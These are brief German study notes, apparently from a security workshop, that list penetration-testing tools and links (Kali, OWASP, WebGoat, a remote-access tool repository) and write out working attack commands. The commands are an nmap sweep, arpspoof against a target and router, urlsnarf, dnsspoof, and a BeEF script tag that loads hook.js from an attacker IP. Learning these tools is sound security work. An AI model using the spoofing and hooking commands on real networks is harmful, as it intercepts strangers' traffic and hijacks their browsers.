https://www.kali.org/downloads/ https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/
Kali-Linux per USB-Stick
patrick: zumeist web application analyse gibt auch reverse engineering
https://null-byte.wonderhowto.com/how-to/hook-web-browsers-with-mitmf-and-beef-0162595/
selenium webserver nachbildung
“privacy idea”
https://de.wikipedia.org/wiki/Open_Web_Application_Security_Project https://www.owasp.org/index.php/Main_Page open wasp (o.ä.)
webgoat
https://github.com/tiagorlampert/CHAOS
nmap -sP 192.168.0.1-255
zum Scannen zmap - veranstaltung bei 31?c3
ARPspoof
ip-forward im kernel aktivieren
arpspoof -i wlan0 -t <Target> -r <IP-des-Routers>
neues Fenster: urlsnarf - i wlan0
zeigt dann die aufgerufenen Webseiten auf Port 80 und 8080 an
dnsspoof
# Beef-Server beef -xss http://192.168.0.209:3000/ui/authentication beef & beef platzieren von: <script src=“http://<IP>:3000/hook.js”></script>
owasp-zap
zum webseiten checken
Man in the middle: https://n0where.net/mitmf/